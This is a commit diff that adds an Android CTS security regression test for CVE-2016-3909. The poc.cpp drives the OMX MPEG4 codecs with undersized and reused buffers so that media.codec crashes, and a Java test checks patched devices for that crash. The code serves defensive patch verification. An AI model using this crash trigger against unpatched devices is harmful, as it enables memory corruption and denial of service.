[RESTRICT AUTOMERGE] CTS test for Android Security b/30033990
Bug: 30033990
Bug: 72505134
Test: Ran the new testcase on android-10.0.0_r1 with/without patch
Change-Id: I2b7cfc76ee96249dd40516063435d264e3efa41c
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-3909/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-3909/Android.bp
new file mode 100644
index 0000000..8e5842d
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-3909/Android.bp
@@ -0,0 +1,44 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2016-3909",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_omxutils",
+ ],
+ shared_libs: [
+ "libstagefright",
+ "libbinder",
+ "libmedia_omx",
+ "libutils",
+ "liblog",
+ "libstagefright_foundation",
+ "libcutils",
+ "libhidlbase",
+ "libhidlmemory",
+ "android.hidl.allocator@1.0",
+ "android.hardware.media.omx@1.0",
+ ],
+ include_dirs: [
+ "frameworks/native/include/media/openmax",
+ "frameworks/av/media/libstagefright",
+ "frameworks/native/include/media/hardware",
+ ],
+ compile_multilib: "32",
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-3909/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-3909/poc.cpp
new file mode 100644
index 0000000..2a8c3ff
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-3909/poc.cpp
@@ -0,0 +1,240 @@
+/*
+* Copyright (C) 2021 The Android Open Source Project
+*
+* Licensed under the Apache License, Version 2.0 (the "License");
+* you may not use this file except in compliance with the License.
+* You may obtain a copy of the License at
+*
+* http://www.apache.org/licenses/LICENSE-2.0
+*
+* Unless required by applicable law or agreed to in writing, software
+* distributed under the License is distributed on an "AS IS" BASIS,
+* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+* See the License for the specific language governing permissions and
+* limitations under the License.
+*/
+
+#include <stdlib.h>
+#include "../includes/common.h"
+
+#include "../includes/omxUtils.h"
+#define FRAME_WIDTH 176
+#define FRAME_HEIGHT 144
+#define MEM_SIZE 4096*4096
+#define BUFFER_COUNT 2
+#define VULNERABLE_MEM_SIZE 8
+#define EMPTY_BUFFER_DONE_CALLBACK_TIMEOUT_SEC 30
+extern int numCallbackEmptyBufferDone;
+sp<IAllocator> mAllocator = IAllocator::getService("ashmem");
+int allocateHidlPortBuffers(OMX_U32 portIndex, Vector<Buffer> *buffers,
+ int BufferSize) {
+ buffers->clear();
+ OMX_PARAM_PORTDEFINITIONTYPE def;
+ int err = omxUtilsGetParameter(portIndex, &def);
+ omxExitOnError(err);
+ for (OMX_U32 i = 0; i < def.nBufferCountActual; ++i) {
+ Buffer buffer;
+ buffer.mFlags = 0;
+ bool success;
+ auto transStatus = mAllocator->allocate(BufferSize, [&success, &buffer](
+ bool s,
+ hidl_memory const& m) {
+ success = s;
+ buffer.mHidlMemory = m;
+ });
+ omxExitOnError(!transStatus.isOk());
+ omxExitOnError(!success);
+ buffers->push(buffer);
+ }
+ return OK;
+}
+
+int main() {
+
+ status_t err;
+ omx_message msg;
+ /* Initialize OMX for the specified codec */
+ status_t ret = omxUtilsInit((char *) "OMX.google.mpeg4.encoder");
+ omxExitOnError(ret);
+ int allCallbacksReceivedEmptyBufferDone = 0;
+ int inMemSize = MEM_SIZE;
+ int outMemSize = MEM_SIZE;
+ int inBufferCnt = BUFFER_COUNT;
+ int outBufferCnt = BUFFER_COUNT;
+ int inBufferSize = inMemSize / inBufferCnt;
+ int outBufferSize = outMemSize / outBufferCnt;
+ /* Get OMX input port parameters */
+ int paramsSize = sizeof(OMX_PARAM_PORTDEFINITIONTYPE);
+ OMX_PARAM_PORTDEFINITIONTYPE *params =
+ (OMX_PARAM_PORTDEFINITIONTYPE *) malloc(paramsSize);
+ memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE));
+ omxUtilsGetParameter(OMX_UTILS_IP_PORT, params);
+ params->nBufferCountActual = BUFFER_COUNT;
+ params->nBufferCountMin = BUFFER_COUNT;
+ params->nPortIndex = OMX_UTILS_IP_PORT;
+ params->nSize = paramsSize;
+ params->nBufferSize = inBufferSize;
+ params->format.video.eColorFormat = OMX_COLOR_FormatYUV420Planar;
+ params->format.video.eCompressionFormat = OMX_VIDEO_CodingUnused;
+ params->format.video.nFrameWidth = FRAME_WIDTH;
+ params->format.video.nFrameHeight = FRAME_HEIGHT;
+ /* Set OMX input port parameters */
+ omxUtilsSetParameter(OMX_UTILS_IP_PORT, params);
+ IOMX::buffer_id *ipBufferId = new IOMX::buffer_id[inBufferCnt];
+ int i;
+ Vector < Buffer > inputBuffers;
+ Vector < Buffer > outputBuffers;
+ /* Allocated input buffers and register with OMX component */
+ allocateHidlPortBuffers(OMX_UTILS_IP_PORT, &inputBuffers, inBufferSize);
+ for (i = 0; i < inBufferCnt; i++) {
+ ipBufferId[i] = inputBuffers[i].mID;
+ omxUtilsUseBuffer(OMX_UTILS_IP_PORT, inputBuffers[i].mHidlMemory,
+ &ipBufferId[i]);
+ }
+ /* Get OMX output port parameters */
+ memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE));
+ omxUtilsGetParameter(OMX_UTILS_OP_PORT, params);
+ params->nBufferCountActual = BUFFER_COUNT;
+ params->nBufferCountMin = BUFFER_COUNT;
+ params->nPortIndex = OMX_UTILS_OP_PORT;
+ params->nSize = paramsSize;
+ params->format.video.eCompressionFormat = OMX_VIDEO_CodingMPEG4;
+ params->format.video.eColorFormat = OMX_COLOR_FormatUnused;
+ params->nBufferSize = outBufferSize;
+ /* Set OMX output port parameters */
+ omxUtilsSetParameter(OMX_UTILS_OP_PORT, params);
+ IOMX::buffer_id *opBufferId = new IOMX::buffer_id[outBufferCnt];
+ /* Allocated output buffers and register with OMX component */
+ allocateHidlPortBuffers(OMX_UTILS_OP_PORT, &outputBuffers, outBufferSize);
+ for (i = 0; i < outBufferCnt; i++) {
+ opBufferId[i] = outputBuffers[i].mID;
+ omxUtilsUseBuffer(OMX_UTILS_OP_PORT, outputBuffers[i].mHidlMemory,
+ &opBufferId[i]);
+ }
+ /* Do OMX State change to Idle */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+ /* Do OMX State change to Executing */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateExecuting);
+ for (int i = 0; i < inBufferCnt; i++) {
+ OMXBuffer omxBuf(0, inBufferSize);
+ omxUtilsEmptyBuffer(ipBufferId[i], omxBuf, 0, 0, -1);
+ }
+ for (int i = 0; i < outBufferCnt; i++) {
+ OMXBuffer omxBuf(0, outBufferSize);
+ omxUtilsFillBuffer(opBufferId[i], omxBuf, -1);
+ }
+ /* Do OMX State change to Idle */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+ time_t currentTime = time(NULL);
+ time_t waitTimeInSeconds = EMPTY_BUFFER_DONE_CALLBACK_TIMEOUT_SEC;
+ time_t endTime = currentTime + waitTimeInSeconds;
+ while (currentTime < endTime) {
+ if (numCallbackEmptyBufferDone == inBufferCnt) {
+ allCallbacksReceivedEmptyBufferDone = 1;
+ break;
+ }
+ currentTime = time(NULL);
+ }
+ if (!allCallbacksReceivedEmptyBufferDone) {
+ ALOGE("Exiting the app");
+ return EXIT_FAILURE;
+ }
+ /* Free input and output buffers */
+ for (i = 0; i < inBufferCnt; i++) {
+ omxUtilsFreeBuffer(OMX_UTILS_IP_PORT, ipBufferId[i]);
+ }
+ err = dequeueMessageForNode(&msg, DEFAULT_TIMEOUT);
+ if (err == TIMED_OUT) {
+ ALOGE("[omxUtils] OMX command timed out for exiting the app");
+ return EXIT_FAILURE;
+ }
+ for (i = 0; i < outBufferCnt; i++) {
+ omxUtilsFreeBuffer(OMX_UTILS_OP_PORT, opBufferId[i]);
+ }
+ omxUtilsFreeNode();
+ /* Initialize OMX for the specified decoder */
+ ret = omxUtilsInit((char *) "OMX.google.mpeg4.decoder");
+ omxExitOnError(ret);
+ Vector < Buffer > newInputBuffers;
+ Vector < Buffer > newOutputBuffers;
+ inMemSize = MEM_SIZE;
+ outMemSize = VULNERABLE_MEM_SIZE;
+ inBufferCnt = BUFFER_COUNT;
+ outBufferCnt = BUFFER_COUNT;
+ inBufferSize = inMemSize / inBufferCnt;
+ outBufferSize = outMemSize / outBufferCnt;
+ /* Get OMX input port parameters */
+ paramsSize = sizeof(OMX_PARAM_PORTDEFINITIONTYPE);
+ params = (OMX_PARAM_PORTDEFINITIONTYPE *) malloc(paramsSize);
+ memset(params, 0, paramsSize);
+ omxUtilsGetParameter(OMX_UTILS_IP_PORT, params);
+ params->nBufferCountActual = BUFFER_COUNT;
+ params->nBufferCountMin = BUFFER_COUNT;
+ params->nPortIndex = OMX_UTILS_IP_PORT;
+ params->nSize = paramsSize;
+ params->format.video.nFrameWidth = FRAME_WIDTH;
+ params->format.video.nFrameHeight = FRAME_HEIGHT;
+ params->nBufferSize = inBufferSize;
+ /* Set OMX input port parameters */
+ omxUtilsSetParameter(OMX_UTILS_IP_PORT, params);
+ ipBufferId = new IOMX::buffer_id[inBufferCnt];
+ /* Allocated input buffers and register with OMX component */
+ allocateHidlPortBuffers(OMX_UTILS_IP_PORT, &newInputBuffers, inBufferSize);
+ for (i = 0; i < inBufferCnt; i++) {
+ ipBufferId[i] = newInputBuffers[i].mID;
+ omxUtilsUseBuffer(OMX_UTILS_IP_PORT, outputBuffers[i].mHidlMemory,
+ &ipBufferId[i]);
+ omxUtilsUseBuffer(OMX_UTILS_IP_PORT, outputBuffers[i].mHidlMemory,
+ &ipBufferId[i]);
+ }
+ /* Get OMX output port parameters */
+ memset(params, 0, paramsSize);
+ omxUtilsGetParameter(OMX_UTILS_OP_PORT, params);
+ params->nBufferCountActual = BUFFER_COUNT;
+ params->nBufferCountMin = BUFFER_COUNT;
+ params->nPortIndex = OMX_UTILS_OP_PORT;
+ params->nSize = paramsSize;
+ params->format.video.nFrameWidth = FRAME_WIDTH;
+ params->format.video.nFrameHeight = FRAME_HEIGHT;
+ params->nBufferSize = outBufferSize;
+ /* Set OMX output port parameters */
+ omxUtilsSetParameter(OMX_UTILS_OP_PORT, params);
+ opBufferId = new IOMX::buffer_id[outBufferCnt];
+ /* Allocated output buffers and register with OMX component */
+ allocateHidlPortBuffers(OMX_UTILS_OP_PORT, &newOutputBuffers,
+ outBufferSize);
+ for (i = 0; i < outBufferCnt; i++) {
+ opBufferId[i] = newOutputBuffers[i].mID;
+ omxUtilsUseBuffer(OMX_UTILS_OP_PORT, newOutputBuffers[i].mHidlMemory,
+ &opBufferId[i]);
+ }
+ /* Do OMX State change to Idle */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+ /* Do OMX State change to Executing */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateExecuting);
+ for (int i = 0; i < inBufferCnt; ++i) {
+ OMXBuffer omxBuf(0, inBufferSize);
+ omxUtilsEmptyBuffer(ipBufferId[i], omxBuf, 0, 0, -1);
+ }
+ for (int i = 0; i < outBufferCnt; ++i) {
+ OMXBuffer omxBuf(0, outBufferSize);
+ omxUtilsFillBuffer(opBufferId[i], omxBuf, -1);
+ }
+ /* Do OMX State change to Idle */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+ /* Free input and output buffers */
+ for (i = 0; i < inBufferCnt; ++i) {
+ omxUtilsFreeBuffer(OMX_UTILS_IP_PORT, ipBufferId[i]);
+ }
+ err = dequeueMessageForNode(&msg, DEFAULT_TIMEOUT);
+ if (err == TIMED_OUT) {
+ ALOGE("[omxUtils] OMX command timed out for exiting the app");
+ return EXIT_FAILURE;
+ }
+ for (i = 0; i < outBufferCnt; ++i) {
+ omxUtilsFreeBuffer(OMX_UTILS_OP_PORT, opBufferId[i]);
+ }
+ omxUtilsFreeNode();
+
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_3909.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_3909.java
new file mode 100644
index 0000000..99fb0ea
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_3909.java
@@ -0,0 +1,38 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2016_3909 extends SecurityTestCase {
+
+ /**
+ * b/30033990
+ * Vulnerability Behaviour: SIGSEGV in media.codec
+ */
+ @SecurityTest(minPatchLevel = "2016-10")
+ @Test
+ public void testPocCVE_2016_3909() throws Exception {
+ pocPusher.only32();
+ String processPatternStrings[] = {"media\\.codec", "omx@\\d+?\\.\\d+?-service"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2016-3909", null, getDevice(),
+ processPatternStrings);
+ }
+}